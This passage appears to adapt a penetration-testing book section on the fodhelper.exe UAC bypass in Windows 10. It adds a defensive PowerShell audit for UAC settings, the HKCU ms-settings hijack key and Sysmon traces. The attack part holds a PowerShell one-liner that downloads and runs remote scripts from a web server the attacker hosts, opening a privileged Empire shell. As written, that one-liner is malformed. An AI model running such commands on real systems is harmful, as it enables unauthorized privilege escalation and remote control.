Using fodhelper to bypass UAC in Windows 10

fodhelper.exe is the executable Windows uses to manage optional features from the Settings app. Because it auto-elevates, attackers who already have a limited shell or normal user access on the victim system can use fodhelper.exe to bypass UAC. This is done by running a one-line PowerShell command from the command line, which results in a shell with system privileges.

With an HTTP web server hosted by the attackers, this can be achieved as follows:

  1. Download the bypass script (https://raw.githubusercontent.com/PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/master/Chapter%2009/Bypass/FodhelperBypass.ps1)
  2. Start the apache2 service in Kali Linux
  3. Copy the script into the web root with cp FodhelperBypass.ps1 /var/www/html/anyfolder/ and then invoke it with the following:
* Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1') FodhelperBypass -program 'cmd.exe /c Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/agent.ps1')"

The preceding command opens a new PowerShell Empire shell with high privilege. We will explore the use of Empire in detail in Chapter 10, Exploitation.
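From the defender's side, the bypass depends on two things that can be audited: UAC not being set to "Always notify" (so that auto-elevating binaries such as fodhelper.exe elevate silently) and a per-user ms-settings handler key under HKCU that fodhelper.exe consults on launch, which a clean profile does not have. The following PowerShell audit is an added example and is not code from the book or from the FodhelperBypass.ps1 script; it reads only documented Windows registry locations, assumes it runs in the context of the user being checked, and the Sysmon query assumes Sysmon is installed with registry logging enabled (it returns nothing otherwise).

```powershell
# Added example, not part of the book: a read-only audit a defender can run on a
# Windows 10 host to see whether the fodhelper UAC bypass would succeed and whether
# the registry artefact it relies on is present in the current user's hive.
# Assumptions: run as the user being checked; Sysmon is optional.

# Documented UAC policy location and the per-user ms-settings handler key that
# fodhelper.exe consults because it auto-elevates.
$script:UacPolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$script:HijackKey    = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

function Get-UacPosture {
    # Only ConsentPromptBehaviorAdmin=2 together with PromptOnSecureDesktop=1
    # ("Always notify") stops auto-elevating binaries from elevating silently.
    $p = Get-ItemProperty -Path $script:UacPolicyKey
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AutoElevationBlocked       = ($p.EnableLUA -eq 1 -and
                                      $p.ConsentPromptBehaviorAdmin -eq 2 -and
                                      $p.PromptOnSecureDesktop -eq 1)
    }
}

function Get-FodhelperHijackKey {
    # A clean profile has no ms-settings handler under HKCU. Its presence, and in
    # particular a DelegateExecute value, is the indicator to investigate.
    if (-not (Test-Path -Path $script:HijackKey)) { return $null }
    $v = Get-ItemProperty -Path $script:HijackKey
    [pscustomobject]@{
        Key                = $script:HijackKey
        Command            = $v.'(default)'
        DelegateExecute    = $v.DelegateExecute
        HasDelegateExecute = ($null -ne $v.DelegateExecute)
    }
}

function Get-FodhelperHijackEvent {
    # Sysmon Event ID 13 (RegistryEvent: value set) on the handler key records
    # which process wrote it and when. Returns nothing if Sysmon is absent.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'ms-settings\\Shell\\Open\\command' } |
        Select-Object TimeCreated, Id, Message
}

function Remove-FodhelperHijackKey {
    # Defensive cleanup of the per-user key once evidence has been collected;
    # the legitimate handler registered under HKLM is not touched.
    if (Test-Path -Path 'HKCU:\Software\Classes\ms-settings') {
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
    }
}

# Usage: report posture, then look for the artefact and its Sysmon trail.
$posture = Get-UacPosture
$posture | Format-List
if (-not $posture.AutoElevationBlocked) {
    Write-Warning 'UAC is not set to "Always notify"; auto-elevating binaries can elevate silently.'
}
$hijack = Get-FodhelperHijackKey
if ($hijack) {
    Write-Warning "fodhelper hijack artefact present: $($hijack.Command)"
    Get-FodhelperHijackEvent | Format-List
} else {
    Write-Output 'No ms-settings handler under HKCU (expected on a clean profile).'
}
```

Setting UAC to "Always notify" via Group Policy is the configuration change that closes this class of auto-elevation bypass; the registry and Sysmon checks above are what an incident responder would run on a host suspected of having been hit with the one-liner from the book, and Remove-FodhelperHijackKey is only called once the evidence has been preserved.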
